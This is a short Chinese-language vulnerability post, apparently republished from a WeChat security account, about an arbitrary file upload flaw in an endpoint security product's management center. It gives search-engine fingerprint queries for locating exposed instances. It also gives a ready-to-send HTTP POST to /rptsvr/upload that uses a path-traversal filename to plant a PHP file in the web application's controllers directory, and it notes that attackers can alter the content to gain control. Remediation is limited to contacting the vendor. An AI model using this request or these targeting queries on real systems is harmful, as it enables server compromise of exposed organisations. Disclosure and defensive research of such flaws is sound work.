产品介绍
奇X信X擎终端安全管理系统是面向政企单位推出的一体化终端安全产品解决方案。该产品集防病毒、终端安全管控、终端准入、终端审计、外设管控、EDR等功能于一体,兼容不同操作系统和计算平台,帮助客户实现平台一体化、功能一体化、数据一体化的终端安全立体防护。
漏洞描述
奇x信 X擎管理中心 <=V6.7.0.4130 版本的rptsvr接口存在任意文件上传漏洞,可上传恶意至服务器,执行脚本文件,从而控制服务器。
资产测绘
banner="QiAnXin web server" || banner="360 web server" || body="appid":"skylar6" || body="/task/index/detail?id={item.id}" || body="已过期或者未授权,购买请联系4008-136-360"
1
漏洞复现
上传POC如下:
POST /rptsvr/upload HTTP/1.1Host: your_ipUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36Connection: closeContent-Length: 360Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Content-Type: multipart/form-data;boundary=---------------------------s3kwcmxrul2yyogjptcdUpgrade-Insecure-Requests: 1-----------------------------s3kwcmxrul2yyogjptcdContent-Disposition: form-data; name="uploadfile"; filename="../../../application/api/controllers/ddd.php"Content-Type: text/x-python123-----------------------------s3kwcmxrul2yyogjptcdContent-Disposition: form-data; name="token"skylar_report-----------------------------s3kwcmxrul2yyogjptcd
访问上传的文件:/application/api/controllers/ddd.php
成功上传,攻击者可以通过修改上传内容来达到想要的目的,需及时进行修复!
修复建议
目前官方已发布安全补丁,受影响用户可联系厂商修复漏洞
免责声明
本文章仅做网络安全技术研究使用!严禁用于非法犯罪行为,请严格遵守国家法律法规;请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
原文始发于微信公众号(TKing的安全圈):奇X信 X擎 rptsvr 任意文件上传漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论